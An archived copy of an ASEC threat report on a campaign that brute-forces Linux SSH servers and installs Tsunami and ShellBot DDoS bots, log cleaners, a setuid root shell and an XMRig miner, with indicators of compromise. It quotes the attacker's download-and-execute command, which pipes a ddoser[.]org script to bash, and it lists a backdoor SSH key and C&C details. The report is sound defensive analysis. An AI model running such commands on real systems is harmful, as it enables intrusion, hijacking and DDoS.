{
	"id": "5358e8fd-706e-4cf1-bca8-504171966ec0",
	"created_at": "2026-04-06T00:18:21.701813Z",
	"updated_at": "2026-04-10T03:20:53.286477Z",
	"deleted_at": null,
	"sha1_hash": "c0643ae2d600552b296f7a535d38e56fdca4e0fd",
	"title": "Tsunami DDoS Malware Distributed to Linux SSH Servers - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3621988,
	"plain_text": "Tsunami DDoS Malware Distributed to Linux SSH Servers - ASEC\r\nBy ATCP\r\nPublished: 2023-06-11 · Archived: 2026-04-05 16:05:52 UTC\r\nAhnLab Security Emergency response Center (ASEC) has recently discovered an attack campaign that consists of the\r\nTsunami DDoS Bot being installed on inadequately managed Linux SSH servers. Not only did the threat actor install\r\nTsunami, but they also installed various other malware such as ShellBot, XMRig CoinMiner, and Log Cleaner.\r\nWhen looking at the attack cases against poorly managed Linux SSH servers, most of them involve the installation of DDoS\r\nbots or CoinMiners. DDoS bot has been covered here in the ASEC Blog before through the attack cases where ShellBot [1]\r\nand ChinaZ DDoS Bot [2] were installed. The installation of XMRig CoinMiner was covered in tandem with the SHC\r\nmalware [3] and the KONO DIO DA attack campaign[4].\r\nTsunami is a DDoS bot that is also known as Kaiten. It is one of the several malware strains that have been consistently\r\ndistributed together with Mirai and Gafgyt when targeting IoT devices that are generally vulnerable. While they all share the\r\ncommon ground of being DDoS bots, Tsunami stands out from the others in that it operates as an IRC bot, utilizing IRC to\r\ncommunicate with the threat actor.\r\nThe source code of Tsunami is publicly available so it is used by a multitude of threat actors. Among its various uses, it is\r\nmostly used in attacks against IoT devices. Of course, it is also consistently used to target Linux servers. Additionally,\r\nsimilar to the case where XMRig CoinMiner was distributed to a public Docker container with Tsunami, another case was\r\nconfirmed where they were also distributed to a cloud environment. In addition, including malware inside unofficially\r\ndistributed Docker containers is one of its primary attack vectors.\r\nThis post will cover a case where a threat actor managed to log in to poorly managed SSH servers after carrying out\r\ndictionary attacks, which was then followed by installing DDoS Bots and XMRig CoinMiner.\r\n1. Dictionary Attack Against Linux SSH Servers\r\nPoorly managed services are one of the prime examples of attack vectors used to target server environments such as Linux\r\nservers. The Secure Shell (SSH) service is installed in most Linux server environments, can easily be used for attacks, and is\r\nprone to poor management. SSH allows administrators to log in remotely and control the system, but they must log into the\r\nuser account registered to the system to do so.\r\nIf simple account credentials (ID/PW) are used in a Linux system, a threat actor can log into the system through brute force\r\nor a dictionary attack, allowing them to execute malicious commands. When Linux SSH servers that are poorly managed are\r\nattacked, the main attack method involves searching externally exposed SSH servers through port scanning and using the\r\nknown account credentials to perform dictionary attacks and log in. Malware is then downloaded afterward.\r\nThe following table is a segment of the list from the aforementioned attack campaign, displaying the addresses of attacker\r\nalong with their IDs and passwords.\r\nID Password Attacker\r\nadmin qwe123Q# 124.160.40[.]48\r\nsxit sxit 124.160.40[.]94\r\nroot abcdefghi 124.160.40[.]94\r\nroot 123@abc 124.160.40[.]94\r\nweblogic 123 124.160.40[.]94\r\nrpcuser rpcuser 124.160.40[.]94\r\ntest p@ssw0rd 124.160.40[.]94\r\nnologin nologin 124.160.40[.]94\r\nHadoop p@ssw0rd 124.160.40[.]94\r\nhxw test123 124.160.40[.]94\r\nbacklog backlog 124.160.40[.]94\r\ndell 123 124.160.40[.]94\r\nTable 1. Attack locations and account credentials used in the attack campaign\r\nhttps://asec.ahnlab.com/en/54647/\r\nPage 1 of 9\n\n2. Attack Flow\r\nAfter successfully logging in, the threat actor executes a command like the one below to download and run various malware.\r\n# nvidia-smi –list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a | grep glo;uname -a;cd /tmp;wget -O –\r\nddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;./a;wget ddoser[.]org/logo;perl logo\r\nirc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;tar -zxvf top;rm -rf top;cd lib32;./go \u003e /dev/null\r\n2\u003e\u00261 \u0026\r\nAmong the malware that are installed, the “key” file is a downloader-type Bash script that installs additional malware. In\r\naddition to being a downloader, it also performs various preliminary tasks to take control of infected systems, which\r\nincludes installing a backdoor SSH account.\r\nWhen logging into a remote SSH server, it is possible to log in without an ID and PW by generating public and private keys.\r\nTo accomplish this, a user can generate public and private SSH keys and then register their public key to their desired server.\r\nAfterward, the private key can be used to log into the client. The threat actor uses this command to newly write the\r\nfollowing public key in the “authorized_keys” file. By doing so, the threat actor is later able to use the corresponding private\r\nkey to the public key, allowing them to log in to the infected system.\r\nssh-rsa\r\nAAAAB3NzaC1yc2EAAAADAQABAAABAQCzml2PeIHOUG+78TIk0lQcR5JC/mlDElDtplEfq8KDiJFwD8z9Shhk2kG0pwzw9uUr7R24h8lnh9D\r\nThe malware that are installed through the executed command and downloader Bash script after login are summarized\r\nbelow. An analysis of each type of malware is also provided.\r\nDownload URL Malware\r\nddoser[.]org/key Downloader Bash\r\nddoser[.]org/logo ShellBot DDoS Bot\r\nddoser[.]org/siwen/bot ShellBot DDoS Bot\r\nddoser[.]org/siwen/a Tsunami DDoS Bot\r\nddoser[.]org/siwen/cls MIG Logcleaner v2.0\r\nddoser[.]org/siwen/clean 0x333shadow Log Cleaner\r\nddoser[.]org/siwen/ping6 Privilege escalation malware\r\nddoser[.]org/top XMRig CoinMiner (compressed file)\r\nTable 2. List of malware used in the attack\r\n3. Malware Analysis\r\n3.1. Tsunami\r\nhttps://asec.ahnlab.com/en/54647/\r\nPage 2 of 9\n\nAs DDoS bot malware also known as Kaiten, Tsunami is used by various threat actors since its source code is publicly\r\navailable. Threat actors often modify the source code of the existing Kaiten to add more features, and the Tsunami used in\r\nthis attack is a variant of Kaiten called Ziggy. When comparing the explanations shown in the actual help command, they are\r\nidentical to the source code.\r\nBy looking at the configuration data included inside the binary of Tsunami, you can see that the threat actor attached the\r\nname “ddoser – v0.69” to it.\r\nA characteristic of Tsunami is that it uses an IRC protocol to communicate with C\u0026C servers. IRC is a real-time Internet\r\nchat protocol developed in 1988. Users log onto certain channels of certain IRC servers and chat with other users who have\r\nlogged onto the same channel in real-time. IRC bot is a bot malware that abuses this IRC service to communicate with C\u0026C\r\nservers.\r\nThe IRC bot installed on the infected system accesses an IRC server’s channel designated by the threat actor according to\r\nthe IRC protocol, after which it either transmits the stolen information to the specified channel or when the attacker enters a\r\nparticular string, it receives this as a command and performs the corresponding malicious behavior. IRC has seen consistent\r\nuse from malware as it uses a preexisting IRC protocol and IRC server without having to develop a separate C\u0026C server and\r\nprotocol.\r\nWhen Tsunami is executed, it writes its own path in the “/etc/rc.local” file, making it so that it runs even after reboots.\r\nAfterward, it attempts to change the name of the process that is currently running to “[kworker/0:0]”. This gives it the same\r\nname as a normal process, making it difficult for users to notice. Once it reaches this point, Tsunami connects to the IRC\r\nserver, joins a channel, and waits for the threat actor’s commands.\r\nAdditionally, information such as the C\u0026C address and the channel password are encrypted and saved. Tsunami decrypts\r\nand retrieves the strings it needs during its execution. There are two C\u0026C server addresses, and Tsunami randomly selects\r\none of them to attempt a connection.\r\nhttps://asec.ahnlab.com/en/54647/\r\nPage 3 of 9\n\nThe following table details the various pieces of configuration data that are included with the C\u0026C server address. Note that\r\na random string is used as the nickname when joining an IRC server.\r\nConfiguration Data\r\nVersion ddoser – v0.69\r\nArchitectre x86_64\r\nName to disguise itself as [kworker/0:0]\r\nC\u0026C server (IRC)\r\nircx.us[.]to:53\r\nircxx.us[.]to:53\r\nIRC channel name ddoser\r\nIRC channel password (enc_passwd) bakla\r\nActivation/deactivation password null\r\nDefault HTTP server address for downloading localhost (deactivated)\r\nTable 3. Tsunami configuration data\r\nTsunami supports various DDoS attack commands along with basic IRC commands. Furthermore, it also provides features\r\nto control infected systems such as system information collection, command execution, and reverse shell.\r\nType Command Feature\r\nRemote\r\ncontrol\r\nSYSINFO\r\nSystem information\r\n(CPU, memory, network information, OS version,\r\nlogin user, Uptime)\r\n  GET Download file from external source\r\n  UPDATE Update bot\r\n  ENABLE / DISABLE Activate/deactivate bot (password required)\r\n  SH / ISH / SHD / BASH Execute shell command\r\n  RSHELL Reverse shell\r\n  KILL Terminate\r\nDDoS attack\r\nPAN / SYNFLOOD /\r\nNSSYNFLOOD\r\nSYN Flood\r\n  ACKFLOOD / NSACKFLOOD Ack Flood\r\nhttps://asec.ahnlab.com/en/54647/\r\nPage 4 of 9\n\nRANDOMFLOOD Syn/Ack Flooder\r\n  UDP UDP Flood\r\n  UNKNOWN Non-spoof UDP Flood\r\n  SPOOFS IP spoofing during DDoS attack\r\n  GETSPOOFS Return IP spoofing used during DDoS attack\r\n  KILLALL Terminate attack\r\nTable 4. List of key commands that are supported\r\n3.2. ShellBot\r\nThe “bot” and “logo” that are installed through the initial execution command and Bash downloader “key” are actually the\r\nsame ShellBot malware. ShellBot is a DDoS bot developed in Perl and it is also an IRC Bot that utilizes the IRC protocol\r\nlike Tsunami. Previously on the ASEC Blog, the ShellBot malware that were used to attack poorly managed Linux SSH\r\nservers had been categorized and analyzed. [5]The ShellBot strains used in this attack are not identical to any of the ones\r\ncovered in that previous post, but they are undeniably variants of ShellBot.\r\nThe ShellBots used in this attack all operate by receiving the C\u0026C server address and port number as arguments. The\r\nfollowing is a list of C\u0026C server addresses used in the attack.\r\nShellBot IRC Server Address\r\nlogo irc.undernet[.]org:6667\r\nbot ircx.us[.]to:6667\r\nbot irc.dal[.]net:6667\r\nbot irc.undernet[.]org:6667\r\nbot ircx.us[.]to:20\r\nTable 5. List of IRC server addresses used by ShellBot\r\nSimilar to other ShellBots, a nickname is selected from a list they are holding. In order to issue commands in the channel,\r\nthe nickname and host address of the threat actor who entered the channel disguised as the admin are verified. The IRC\r\nchannel uses the same name as the Tsunami malware, “#ddoser”.\r\nShellBot Configuration Data\r\nBoth Channel name ddoser, #packeter\r\nBoth Channel password s6x\r\nBoth Nickname (multiple)\r\nbot\r\nChannel admin’s\r\nnickname\r\n“Janroe”,”thief”,”eXploiter”,”Bolero”,”Janr0e”,”nobody”\r\nhttps://asec.ahnlab.com/en/54647/\r\nPage 5 of 9\n\nlogo\r\nChannel admin’s\r\nnickname\r\n“Janroe”,”thief”,”eXploiter”,”emperor”,”nobody”\r\nbot Channel admin’s host\r\n“exploiter.users.undernet[.]org”,\r\n“Janroe.users.undernet[.]org”,\r\n“ddoser.users.undernet[.]org”,\r\n“ddoser[.]de”,”ddoser[.]org”\r\nlogo Channel admin’s host\r\n“exploiter.users.undernet[.]org”,\r\n“theft.users.undernet[.]org”,\r\n“Janroe.users.undernet[.]org”,\r\n“ddoser[.]org”,”ddoser[.]de”\r\nTable 6. Configuration data of ShellBot\r\nShellBot supports port scanning, basic DDoS attacks, and reverse shells.\r\nCommand Feature\r\nportscan Port scan\r\nudpflood UDP Flood\r\ntcpflood TCP Flood\r\nhttpflood HTTP Flood\r\nback Reverse shell\r\nTable 7. List of key commands that are supported\r\n3.3. Log Cleaner\r\nLog Cleaner malware exists among the malware that are installed by the threat actor. In Linux server environments, there are\r\nvarious types of log files that record the activities of users or threat actors. Log Cleaner is a tool that enables the deletion or\r\nmodification of specific logs within these log files. It is believed that the threat actor installed Log Cleaner with the intention\r\nof hindering any subsequent analysis of their breach.\r\nAmong the files that are installed, “cls” is “MIG Logcleaner v2.0” and “clean” is “0x333shadow Log Cleaner”. For starters,\r\nMIG LogCleaner is capable of receiving various options as arguments, like the ones shown below, to delete desired logs\r\nfrom Linux, Unix, and BSD systems.\r\nArgument Description\r\n[-u \u003cuser\u003e] User name\r\n[-n \u003cn\u003e] Number of entries to delete. The default is 1. 0 will select all.\r\n[-D \u003cdir\u003e] Base log directory (Default is /var/log/)\r\n[-a \u003cstring1\u003e] IP string to remove from files within the log directory\r\n[-b \u003cstring2\u003e] Domain string to remove from files within the log directory\r\nhttps://asec.ahnlab.com/en/54647/\r\nPage 6 of 9\n\n[-R] Replace Mode\r\n[-A] Add Mode\r\n[-U \u003cuser\u003e] User name to change or add in Replace or Add Mode\r\n[-H \u003chost\u003e] Host name to change or add in Replace or Add Mode\r\n[-I \u003cn\u003e] Login time to change or add in Replace or Add Mode\r\n[-O \u003cn\u003e] Logout time to change or add in Replace or Add Mode\r\n[-T \u003ctty\u003e] tty to add in Add Mode\r\n[-d] Run in debug mode\r\nTable 8. How to use MIG LogCleaner\r\nThe log files related to users logged into a Linux environment are as follows, and threat actors can manipulate these log files\r\nto either delete or change login records.\r\n  Path Details Command\r\nutmp\r\n/var/run/utmp (Linux)\r\n/var/adm/utmpx (Solaris)\r\nInformation of currently logged-in user w, who, finger\r\nwtmp\r\n/var/log/wtmp (Linux)\r\n/var/adm/wtmpx (Solaris)\r\nLogin/logout information last\r\nlast log\r\n/var/log/lastlog (Linux)\r\n/var/adm/lastlog (Solaris)\r\nInformation of last successful login\r\nlastlog (Linux)\r\nfinger (Solaris)\r\nTable 9. Log types in the Linux environment\r\nMVarious log files can be modified through MIG LogCleaner. For example, it can delete lines that have a specific string,\r\nreplace the string, or add a new string. Furthermore, a command like the one below can be used to add a login record.\r\nThe “0x333shadow Log Cleaner” which is installed together has identical features.\r\nhttps://asec.ahnlab.com/en/54647/\r\nPage 7 of 9\n\n3.4. Privilege Escalation Malware\r\nThe “ping6” file is an ELF malware with the following simple structure. The setuid() and setgid() functions are used to set\r\nthe user ID and group ID as the root account before executing the shell.\r\nThe “key” Bash script sets the setuid after installing “ping6”. If a successful login is made with the root account and the\r\n“key” Bash script is installed with the account, the threat actor can subsequently utilize “ping6” to gain access to a shell with\r\nroot privileges.\r\n3.5. XMRig CoinMiner\r\nIn this particular attack campaign, a CoinMiner is also installed alongside the DDoS bots. The command that is executed\r\nafter logging in through a dictionary attack downloads and decompresses a compressed file called tar. The resulting “go” file\r\nis then executed. As a simple Bash script, “go” executes the “televizor” file which is located in the same path. “televizor” is\r\nalso a Bash script and it executes the “telecomanda” Bash script. This ultimately leads to the XMRig CoinMiner “cnrig”\r\nbeing executed.\r\nThe configuration data required for coin mining is held by the “config.json” file which exists in the same path.\r\nMining Pool : monerohash[.]com:80\r\nuser :\r\n“46WyHX3L85SAp3oKu1im7EgaVGBsWYhf7KxrebESVE6QHA5vJRab6wF1gsVkYwJfnNV2KYHU1Xq2A9XUYmWhvzPf2E6Nvse”\r\npass : “nobody”\r\n4. Conclusion\r\nAttack campaigns on poorly managed Linux SSH servers have been occurring persistently for quite some time. The threat\r\nactor installed XMRig CoinMiner alongside DDoS bots like Tsunami and ShellBot on infected systems.\r\nhttps://asec.ahnlab.com/en/54647/\r\nPage 8 of 9\n\nIn environments where the CoinMiner is installed, the infected system’s resources are used to mine Monero coins for the\r\nthreat actor. Infected systems can also be used for DDoS attacks due to the DDoS bots that are also installed, allowing\r\nadditional malicious commands to be executed. Even if these malware are deleted, the threat actor can regain access to the\r\nsystem using the SSH backdoor account they had also installed. This allows them to perform various malicious behaviors\r\nlike installing different malware and stealing information from the system.\r\nBecause of this, administrators should use passwords that are difficult to guess for their accounts and change them\r\nperiodically to protect the Linux server from brute force attacks and dictionary attacks and update to the latest patch to\r\nprevent vulnerability attacks. They should also use security programs such as firewalls for servers accessible from outside to\r\nrestrict access by attackers. Finally, caution must be practiced by updating V3 to the latest version to block malware\r\ninfection in advance.\r\nFile Detection\r\n– Linux/CoinMiner.Gen2 (2019.07.31.08)\r\n– Linux/Tsunami.Gen (2016.08.24.00)\r\n– Shellbot/Perl.Generic.S1118 (2020.02.19.07)\r\n– Downloader/Shell.Agent.SC189601 (2023.06.12.02)\r\n– HackTool/Linux.LogWiper.22272 (2023.06.12.02)\r\n– HackTool/Linux.LogWiper.28728 (2023.06.12.02)\r\n– Trojan/Linux.Agent.8456 (2023.06.12.02)\r\n– Trojan/Shell.Runner (2023.06.12.02)\r\n– CoinMiner/Text.Config (2023.06.12.02)\r\nMD5\r\n0014403121eeaebaeede796e4b6e5dbe\r\n125951260a0cb473ce9b7acc406e83e1\r\n2cd8157ba0171ca5d8b50499f4440d96\r\n32eb33cdfa763b012cd8bcad97d560f0\r\n421ffee8a223210b2c8f2384ee6a88b4\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//ddoser[.]org/a\r\nhttp[:]//ddoser[.]org/key\r\nhttp[:]//ddoser[.]org/logo\r\nhttp[:]//ddoser[.]org/siwen/clean\r\nhttp[:]//ddoser[.]org/siwen/cls\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner\r\nbelow.\r\nSource: https://asec.ahnlab.com/en/54647/\r\nhttps://asec.ahnlab.com/en/54647/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/54647/"
	],
	"report_names": [
		"54647"
	],
	"threat_actors": [],
	"ts_created_at": 1775434701,
	"ts_updated_at": 1775791253,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c0643ae2d600552b296f7a535d38e56fdca4e0fd.pdf",
		"text": "https://archive.orkl.eu/c0643ae2d600552b296f7a535d38e56fdca4e0fd.txt",
		"img": "https://archive.orkl.eu/c0643ae2d600552b296f7a535d38e56fdca4e0fd.jpg"
	}
}